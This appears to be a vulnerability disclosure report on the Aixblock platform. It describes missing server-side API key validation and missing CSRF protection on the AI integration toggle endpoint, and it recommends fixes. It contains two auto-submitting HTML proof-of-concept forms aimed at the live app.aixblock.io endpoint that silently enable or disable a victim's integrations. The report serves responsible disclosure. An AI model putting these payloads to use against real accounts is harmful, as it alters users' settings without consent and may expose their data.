Description
🧩 Summary
Aixblock lets users integrate with multiple AI providers: OpenAI, Anthropic, Replicate, and its native Aixblock AI. The UI appears to require an API key before an integration can be activated, but this validation is not enforced server-side.
Additionally, the platform's integration toggle endpoints lack CSRF protection entirely. As a result, a malicious actor can use a crafted page to silently enable or disable any integration on behalf of a logged-in victim, without the victim's knowledge or consent.
Notably, while enabling always succeeds, disabling (deleting) is handled inconsistently for all four providers, including Aixblock's native integration. CSRF is still possible on the disable path, but requests sometimes fail due to timing, session instability, or race conditions rather than any deliberate security enforcement.
🧠 Affected Providers
- ✅ OpenAI
- ✅ Anthropic
- ✅ Replicate
- ✅ Aixblock AI
All providers are impacted by both CSRF and lack of server-side API key validation.
💥 Impact
- An attacker can silently toggle any AI integration on/off in a victim's account.
- No valid API key is required to enable integrations.
- Disabling (deleting) integrations is possible via CSRF even when the UI suggests confirmation or validation.
- Unauthorized data sharing with third-party providers may occur (e.g., OpenAI, Anthropic).
- Potential misuse of the victim's automation, API call quotas, or account limits.
- Business logic and security UX breakdown: users are misled by the frontend's API key requirement.
🧪 Steps to Reproduce
✅ 1. Enable Integration Without API Key
1. Log in as a normal user.
2. Navigate to the AI Integration settings (e.g., OpenAI).
3. Do not provide any API key. Click "Save".
4. Observe: the integration becomes enabled anyway.
🚨 2. CSRF Exploit (Silent Enable for Any Provider)
```html
<!-- csrf-enable.html -->
<form action="https://app.aixblock.io/api/integrations/ai-extension" method="POST">
  <input type="hidden" name="enabled" value="true">
  <input type="hidden" name="provider" value="openai"> <!-- Replace with 'replicate', 'anthropic', or 'aixblock-ai' -->
</form>
<script>
  document.forms[0].submit();
</script>
```
⚠️ 3. CSRF Exploit (Silent Disable – Inconsistent)
```html
<!-- csrf-disable.html -->
<form action="https://app.aixblock.io/api/integrations/ai-extension" method="POST">
  <input type="hidden" name="enabled" value="false">
  <input type="hidden" name="provider" value="aixblock-ai"> <!-- Replace with any provider -->
</form>
<script>
  document.forms[0].submit();
</script>
```
Result: enabling always succeeds. Disable requests are processed but often behave inconsistently, sometimes hanging or silently failing with no response. This is caused by backend timing flaws, not by any security control.
📉 Observed Behavior Summary
Provider | Enabled w/o API Key | Disable via CSRF | Notes |
---|---|---|---|
OpenAI | ✅ Yes | No API key required; CSRF works | |
Anthropic | ✅ Yes | Same as above | |
Replicate | ✅ Yes | Same as above | |
Aixblock AI | ✅ Yes | Same CSRF flaw; no validation |
⚙️ Root Causes
- 🔓 No CSRF tokens or SameSite protection on integration endpoints.
- 🔓 Server accepts requests without checking or validating API keys.
- 🔓 Server trusts frontend-only logic for gating actions.
- 🔓 Misleading UI implies a validation that does not exist.
🔐 Recommendations
1. Enforce API key validation server-side
   - Require a real, validated API key per provider.
   - Do not process requests with missing or dummy keys.
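As a sketch of what server-side validation could look like (the function and handler names here are illustrative, not Aixblock's actual code), the backend can probe the key against the provider before persisting the integration. OpenAI's `GET /v1/models` is a cheap authenticated endpoint suitable for this check:

```javascript
// Illustrative sketch: verify an OpenAI key server-side before enabling
// the integration. `fetchImpl` is injectable for testing; it defaults to
// the global fetch available in Node 18+.
async function isValidOpenAIKey(apiKey, fetchImpl = fetch) {
  if (typeof apiKey !== 'string' || apiKey.trim() === '') {
    return false; // reject missing or blank keys without any network call
  }
  const res = await fetchImpl('https://api.openai.com/v1/models', {
    headers: { Authorization: `Bearer ${apiKey}` },
  });
  return res.ok; // 2xx: provider accepted the key; 401: it did not
}
```

The enable handler would call this and refuse to store or activate the integration whenever it returns false.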
2. Implement proper CSRF protection
   - Use anti-CSRF tokens.
   - Set session cookies with SameSite=Lax or Strict.
3. Harden the disable logic
   - Ensure enabled=false requests are authenticated, validated, and reliably handled.
   - Return consistent response codes.
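Sketched as plain request logic (all names hypothetical), a hardened disable path returns a definite status on every branch, so clients never see the hung or empty responses described above:

```javascript
// Hypothetical hardened disable handler: every path yields a concrete
// status code instead of hanging or silently dropping the request.
function handleDisableRequest({ session, csrfValid, provider, integrations }) {
  if (!session) return { status: 401, error: 'not authenticated' };
  if (!csrfValid) return { status: 403, error: 'invalid CSRF token' };
  if (!integrations.has(provider)) return { status: 404, error: 'integration not found' };
  integrations.delete(provider); // the only state change, reached only after all checks
  return { status: 200 };
}
```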
4. Align the UI with backend logic
   - If an API key is not mandatory, do not prompt for one.
   - If it is mandatory (preferred), enforce it server-side.
Final Score: 9.0 (Critical)
📌 Conclusion
The AI integration logic on Aixblock suffers from critical backend design flaws: no CSRF protection, missing validation of API keys, and inconsistent behavior for disable flows. Any attacker can exploit this to manipulate automation settings, potentially causing data exposure, financial risk, and logic compromise for all affected users.
PoC videos:
- https://drive.google.com/file/d/1YdE2ZTLq18RL2-Ua9R8lfSaTLnTXlCBe/view?usp=drive_link
- https://drive.google.com/file/d/1L6cvQcyIcL34EnbKbqCNxixh49XxYEzb/view?usp=drive_link